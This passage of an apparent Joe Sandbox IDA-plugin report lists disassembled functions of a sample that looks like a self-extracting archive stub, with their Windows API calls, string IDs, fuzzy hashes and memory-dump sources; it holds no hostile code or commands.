    • Opcode Fuzzy Hash: 53973498175bef3082e72ea859bd0b0a3422a37ba613f496b9d71c0d73d458df
    • Instruction Fuzzy Hash: 7B515926B41323A1DB305A648811B7673E0DFA7759F68042BFCD08B6C0FB658E81D363
    APIs
    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CC0FB2,00000000,00000000,00000000,00000000,00000000,?), ref: 00CC087F
    • __fassign.LIBCMT ref: 00CC08FA
    • __fassign.LIBCMT ref: 00CC0915
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CC093B
    • WriteFile.KERNEL32(?,00000000,00000000,00CC0FB2,00000000,?,?,?,?,?,?,?,?,?,00CC0FB2,00000000), ref: 00CC095A
    • WriteFile.KERNEL32(?,00000000,00000001,00CC0FB2,00000000,?,?,?,?,?,?,?,?,?,00CC0FB2,00000000), ref: 00CC0993
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
    • String ID:
    • API String ID: 1324828854-0
    • Opcode ID: 43552f066ee92765e31a5a50d69c329fb97ef8da684101cbafd21c98a0000244
    • Instruction ID: c6c46c310d41ba550afb1a7fd9511e624a7dfcba7d2a39430847ca1a67cf1771
    • Opcode Fuzzy Hash: 43552f066ee92765e31a5a50d69c329fb97ef8da684101cbafd21c98a0000244
    • Instruction Fuzzy Hash: 89517F71A00249DFDB14CFA8D885FEEBBB8EF09311F24415AE955E7292E7309A41CB61
    APIs
    • _ValidateLocalCookies.LIBCMT ref: 00CB3AB7
    • ___except_validate_context_record.LIBVCRUNTIME ref: 00CB3ABF
    • _ValidateLocalCookies.LIBCMT ref: 00CB3B48
    • __IsNonwritableInCurrentImage.LIBCMT ref: 00CB3B73
    • _ValidateLocalCookies.LIBCMT ref: 00CB3BC8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
    • String ID: csm
    • API String ID: 1170836740-1018135373
    • Opcode ID: b3379af1ebb0a785a34a7a1420822c442503f9c91c200bf1ab19857bfd50340a
    • Instruction ID: 9421a8ce7e5a4b7a7265e30bc9ed9dd048e6ddbbdedffb539f10b60b89a76647
    • Opcode Fuzzy Hash: b3379af1ebb0a785a34a7a1420822c442503f9c91c200bf1ab19857bfd50340a
    • Instruction Fuzzy Hash: 1341C134A00248AFCF14DF69C885ADEBFB5EF44314F148165E828AB396D731AF05DB90
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
    • API String ID: 176396367-3743748572
    • Opcode ID: 9badb7c0ab0a3fa9048b436486c3113ed0b671b729fee8bd695416aa87728ad4
    • Instruction ID: a4b86270c8245a6bb7724e0ecc110a7fee32b0b2d9eec948af1967205186bc89
    • Opcode Fuzzy Hash: 9badb7c0ab0a3fa9048b436486c3113ed0b671b729fee8bd695416aa87728ad4
    • Instruction Fuzzy Hash: 59314022644303AAD634AB54DC42BB773E4EB91324F60842EF865572C1FB60AE84D7A3
    APIs
      • Part of subcall function 00CBDA18: _free.LIBCMT ref: 00CBDA41
    • _free.LIBCMT ref: 00CBDAA2
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CBDAAD
    • _free.LIBCMT ref: 00CBDAB8
    • _free.LIBCMT ref: 00CBDB0C
    • _free.LIBCMT ref: 00CBDB17
    • _free.LIBCMT ref: 00CBDB22
    • _free.LIBCMT ref: 00CBDB2D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction ID: 18c610adcb248ec77423d76954856bc069534991daa861a460b2630cdd91351e
    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
    • Instruction Fuzzy Hash: E5113371984B08BAD624BBB0CC0BFCBB79C6F15700F444C16B29BB6052EA75B9057791
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CAF7E5,00CAF748,00CAF9E9), ref: 00CAF781
    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CAF797
    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CAF7AC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressProc$HandleModule
    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
    • API String ID: 667068680-1718035505
    • Opcode ID: 208bdb8bc7c0b63f3c934fde0c1ed134f7778cb334278fc7bbf069acc04d011e
    • Instruction ID: a9aa0293009afeba4ed342d60ded8e4ededa171c69f8c38c0650c243e5a43bc2
    • Opcode Fuzzy Hash: 208bdb8bc7c0b63f3c934fde0c1ed134f7778cb334278fc7bbf069acc04d011e
    • Instruction Fuzzy Hash: A0F096317512636BAB219FF49DD5F7A22DC9A07359325043DEA21D3640E670CE439BF1
    APIs
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA27E1
      • Part of subcall function 00C9C619: GetVersionExW.KERNEL32(?), ref: 00C9C63E
    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CA2805
    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CA281F
    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CA2832
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA2842
    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA2852
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Time$File$System$Local$SpecificVersion
    • String ID:
    • API String ID: 2092733347-0
    • Opcode ID: d898cf29ba94881aa82a19a948e2ee280aa92909ca2a2ec7d2c420e8e2c822e7
    • Instruction ID: 3bdc7400bb1a0b89a44a2b1548f5e62718be3ea9ee64d726c04767d231e57397
    • Opcode Fuzzy Hash: d898cf29ba94881aa82a19a948e2ee280aa92909ca2a2ec7d2c420e8e2c822e7
    • Instruction Fuzzy Hash: A8310676108316AFC704DFA8D884A9FB7E8BF98744F048A1EF995C3210E730D549CBA6
    APIs
    • GetLastError.KERNEL32(?,?,00CB3C71,00CB3A2C,00CB0BE4), ref: 00CB3C88
    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CB3C96
    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CB3CAF
    • SetLastError.KERNEL32(00000000,00CB3C71,00CB3A2C,00CB0BE4), ref: 00CB3D01
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLastValue___vcrt_
    • String ID:
    • API String ID: 3852720340-0
    • Opcode ID: 9622a55646f8bdf071fe8ee9a068ef9dad19c925f9631871bec1ad05a6335fce
    • Instruction ID: e21bb29d0a4398435a488e26928fb0d50314cf8eaa7e2d7d11a2bc4875ea306c
    • Opcode Fuzzy Hash: 9622a55646f8bdf071fe8ee9a068ef9dad19c925f9631871bec1ad05a6335fce
    • Instruction Fuzzy Hash: E801D83220E351AE9A1827BD7C95BEF6F88EB01772F30032AF530A50E1EF115E00A594
    APIs
    • GetLastError.KERNEL32(?,00CD3070,00CB5972,00CD3070,?,?,00CB5271,00000050,?,00CD3070,00000200), ref: 00CBA509
    • _free.LIBCMT ref: 00CBA53C
    • _free.LIBCMT ref: 00CBA564
    • SetLastError.KERNEL32(00000000,?,00CD3070,00000200), ref: 00CBA571
    • SetLastError.KERNEL32(00000000,?,00CD3070,00000200), ref: 00CBA57D
    • _abort.LIBCMT ref: 00CBA583
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: b5d94b07b6eb03df316b32875c3bc5dbd007366860212f8f481a9d05abf36167
    • Instruction ID: 8cdcaff7acf6594fc1e3650f347eb9c4aa61fb1dc523e73b26ee14d990d024fe
    • Opcode Fuzzy Hash: b5d94b07b6eb03df316b32875c3bc5dbd007366860212f8f481a9d05abf36167
    • Instruction Fuzzy Hash: D7F0FC31540E0167C2257379BC4AFEF2BA99FD1721F250025F6A5E2192EE218F06A527
    APIs
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CAED87
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAEDA1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CAEDB2
    • TranslateMessage.USER32(?), ref: 00CAEDBC
    • DispatchMessageW.USER32(?), ref: 00CAEDC6
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CAEDD1
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
    • String ID:
    • API String ID: 2148572870-0
    • Opcode ID: 859c3ccf1a0f42ba4a19b8f7ad0512c33ffb7a077b09364208b66ae012d27d8d
    • Instruction ID: 54970dd777e8ba636190cfbb4b3dad2270d93526d73963214399a3768ff31324
    • Opcode Fuzzy Hash: 859c3ccf1a0f42ba4a19b8f7ad0512c33ffb7a077b09364208b66ae012d27d8d
    • Instruction Fuzzy Hash: B3F0E772A0161ABBCB206BA5EC4CFDF7F6DEF42795B108021F71AD2051DA349645CBE1
    APIs
      • Part of subcall function 00CA1900: _wcslen.LIBCMT ref: 00CA1906
      • Part of subcall function 00C9CD5C: _wcsrchr.LIBVCRUNTIME ref: 00C9CD73
    • _wcslen.LIBCMT ref: 00C9D5A4
    • _wcslen.LIBCMT ref: 00C9D5EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$_wcsrchr
    • String ID: .exe$.rar$.sfx
    • API String ID: 3513545583-31770016
    • Opcode ID: b34952f0a71d6b0b83f64a3c196b4aaef9b05df8ca0cd4519ba4cd72417a9ab6
    • Instruction ID: c4906976ec01e1edda604088d0d52276b801f8c1aa2bc9ff7500c6352157b44d
    • Opcode Fuzzy Hash: b34952f0a71d6b0b83f64a3c196b4aaef9b05df8ca0cd4519ba4cd72417a9ab6
    • Instruction Fuzzy Hash: 744159A290036199CF35BF74C859A3BB3A8EF5174CF16490EF8A7BB081E7608E81D351
    APIs
    • GetTempPathW.KERNEL32(00000800,?), ref: 00CADFD0
      • Part of subcall function 00C9CAA0: _wcslen.LIBCMT ref: 00C9CAA6
    • _swprintf.LIBCMT ref: 00CAE004
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • SetDlgItemTextW.USER32(?,00000066,00CE2892), ref: 00CAE024
    • EndDialog.USER32(?,00000001), ref: 00CAE131
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
    • String ID: %s%s%u
    • API String ID: 110358324-1360425832
    • Opcode ID: 6e0f4f3913186fe30d39cd0159bebe9ab1ef64af4b6495fe4f930c31b14a9d14
    • Instruction ID: 0a60ba013815a505f7556ffbcdecf093d1e256d90845410e5fa25437e4ba27d8
    • Opcode Fuzzy Hash: 6e0f4f3913186fe30d39cd0159bebe9ab1ef64af4b6495fe4f930c31b14a9d14
    • Instruction Fuzzy Hash: C8413471900259AADF25DB60DC45FEE77FCEB06308F4480A6F90AA7051EF719A44DFA1
    APIs
    • _wcslen.LIBCMT ref: 00C9CF56
    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00C9B505,?,?,00000800,?,?,00C9B4CA,?), ref: 00C9CFF4
    • _wcslen.LIBCMT ref: 00C9D06A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$CurrentDirectory
    • String ID: UNC$\\?\
    • API String ID: 3341907918-253988292
    • Opcode ID: f601f59fd72e2dc4ea48f494dd91f1296bdaf6b15b8e70927bca60881b4df92f
    • Instruction ID: e6a95a089f2fb5afc7de295dd1697506932a7b796416978ccaf3043a3307ea28
    • Opcode Fuzzy Hash: f601f59fd72e2dc4ea48f494dd91f1296bdaf6b15b8e70927bca60881b4df92f
    • Instruction Fuzzy Hash: C341E732444225BACF20AFB0CC49EEF77A9AF45391F144426F866B3141E774DA42D751
    APIs
    • LoadBitmapW.USER32(00000065), ref: 00CAC8CD
    • GetObjectW.GDI32(00000000,00000018,?), ref: 00CAC8F2
    • DeleteObject.GDI32(00000000), ref: 00CAC924
    • DeleteObject.GDI32(00000000), ref: 00CAC947
      • Part of subcall function 00CAB6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CAC91D,00000066), ref: 00CAB6D5
      • Part of subcall function 00CAB6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB6EC
      • Part of subcall function 00CAB6C2: LoadResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB703
      • Part of subcall function 00CAB6C2: LockResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB712
      • Part of subcall function 00CAB6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00CAC91D,00000066), ref: 00CAB72D
      • Part of subcall function 00CAB6C2: GlobalLock.KERNEL32(00000000), ref: 00CAB73E
      • Part of subcall function 00CAB6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CAB762
      • Part of subcall function 00CAB6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CAB7A7
      • Part of subcall function 00CAB6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CAB7C6
      • Part of subcall function 00CAB6C2: GlobalFree.KERNEL32(00000000), ref: 00CAB7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
    • String ID: ]
    • API String ID: 1797374341-3352871620
    • Opcode ID: d5689392243c469efe476260e15373910088e0f6902a03dcbf214ee016cf2a43
    • Instruction ID: 363bebcb75755cd40600af27f0531ddcbb9bddf3f14739ca6a1d52d787177999
    • Opcode Fuzzy Hash: d5689392243c469efe476260e15373910088e0f6902a03dcbf214ee016cf2a43
    • Instruction Fuzzy Hash: BA01F53290060767D71177749C49F7F3A7AAF83B69F150010FA10B72D2DF318D0596A1
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • EndDialog.USER32(?,00000001), ref: 00CAE78B
    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CAE7A1
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CAE7B5
    • SetDlgItemTextW.USER32(?,00000068), ref: 00CAE7C4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: RENAMEDLG
    • API String ID: 364370097-3299779563
    • Opcode ID: 2a29aa0f1dc9a92e393d2e1a880a3b8ff59489bed2bba106b12737ed866a63ae
    • Instruction ID: 675efd349373357b53999e8e1d0339905e2e7e864bd1580a4dbac0110d8183fd
    • Opcode Fuzzy Hash: 2a29aa0f1dc9a92e393d2e1a880a3b8ff59489bed2bba106b12737ed866a63ae
    • Instruction Fuzzy Hash: 1601FC32680715BBE2118B759C4DFBF3B6DFB5BB06F144415F301E60D0C6626905C7A6
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CB91D6,00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002), ref: 00CB9245
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CB9258
    • FreeLibrary.KERNEL32(00000000,?,?,?,00CB91D6,00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002), ref: 00CB927B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
